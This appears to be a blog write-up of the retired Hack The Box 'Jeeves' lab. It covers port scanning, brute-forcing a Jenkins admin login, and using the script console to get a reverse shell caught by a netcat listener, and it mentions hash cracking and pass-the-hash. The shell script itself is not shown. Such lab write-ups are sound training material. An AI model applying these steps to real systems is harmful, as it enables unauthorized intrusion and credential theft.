Good day all
Below is a system we hacked from the beginning to the end without including the priv escalation used to root the system. We want to ensure that we do not make this to easy for the noobs still learning. Please note this was a Windows system that we have done on Hack the box in a LAB which has been retired.
root@Skullack:~# nmap -sV 10.10.10.63 -p- –reason
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-10 21:43 SAST
Nmap scan report for 10.10.10.63
Host is up, received echo-reply ttl 127 (0.19s latency).
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 – 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Using curl to view source code
root@Skullack:~# curl -i http://10.10.10.63
HTTP/1.1 200 OK
Last-Modified: Mon, 06 Nov 2017 02:34:40 GMT
Date: Tue, 10 Apr 2018 22:54:37 GMT
port 5000 showed us the login page of the web page:
WHAT IS JENKINS
Jenkins is an open source automation server written in Java. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat
We brute forced the admin login on the web interface and we are in. Going through all the settings we noticed a script console that runs java script. We proceeded to build our script and start a netcat listener to catch the connection back to our attacking system.
Script used: see below image
Starting a Netcat listener on port 8044 and running the script. Below you can see we are logged in to the server running Jenkins by using a malicious java script.
root@Skullack:~# nc -nlvp 8044
listening on [any] 8044 …
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.63] 49723
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\Administrator.jenkins
04/10/2018 11:06 PM .
04/10/2018 11:06 PM ..
04/10/2018 10:07 PM 48 .owner
04/10/2018 08:43 PM 1,684 config.xml
04/10/2018 11:06 PM 1,353 credentials.xml
04/10/2018 08:43 PM 156 hudson.model.UpdateCenter.xml
11/03/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
11/03/2017 10:33 PM 1,712 identity.key.enc
11/03/2017 10:46 PM 94 jenkins.CLI.xml
04/10/2018 11:06 PM 148,268 jenkins.err.log
11/03/2017 10:47 PM 360,448 jenkins.exe
11/03/2017 10:47 PM 331 jenkins.exe.config
04/10/2018 08:43 PM 4 jenkins.install.InstallUtil.lastExecVersion
11/03/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
11/03/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
12/24/2017 03:38 PM 2,688 jenkins.out.log
04/10/2018 08:42 PM 4 jenkins.pid
11/03/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
11/03/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
11/03/2017 10:47 PM 74,271,222 jenkins.war
04/10/2018 08:42 PM 34,147 jenkins.wrapper.log
11/03/2017 10:49 PM 2,881 jenkins.xml
04/10/2018 11:10 PM jobs
11/03/2017 10:33 PM logs
04/10/2018 08:43 PM 907 nodeMonitors.xml
11/03/2017 10:33 PM nodes
11/03/2017 10:44 PM plugins
11/03/2017 10:47 PM 129 queue.xml.bak
11/03/2017 10:33 PM 64 secret.key
11/03/2017 10:33 PM 0 secret.key.not-so-secret
04/10/2018 09:23 PM secrets
04/10/2018 09:03 PM 62 test.bat
04/10/2018 09:12 PM 76 test.ftp
11/08/2017 09:52 AM updates
04/10/2018 10:59 PM userContent
11/03/2017 10:33 PM users
11/03/2017 10:47 PM war
11/03/2017 10:43 PM workflow-libs
04/10/2018 08:49 PM workspace
26 File(s) 74,827,125 bytes
13 Dir(s) 6,945,353,728 bytes free
Searching for hidden and alternate data streams on the system. Why? typically we do this to find hidden files and folders that administrators or users setup.
Command = DIR /A:H /R
The Windows privilege escalation ended in finding alternate data streams and then cracking the keypass2 file which contained a long salted hash.
We cracked the hash and was presented with the password. Using a technique called pass the hash which is supposedly to be long dead ( NOT ) worked flawlessly.
Again finding alternate data streams using command dir /R presented us with a hidden text file. We proceeded to read the hidden text file and their we had it we owned the system.
Since we still have new hackers or noobs learning how to do this I have decided to not include the full priv escalation technique used to get root on this system. ( Sorry Noobs but the answer is starring you in the face ).
Hope you enjoyed this post and perhaps learned something from it.
Till next time.
Gerhard De Villiers-Mohr – Senior Ethical Hacker – Secure ICT.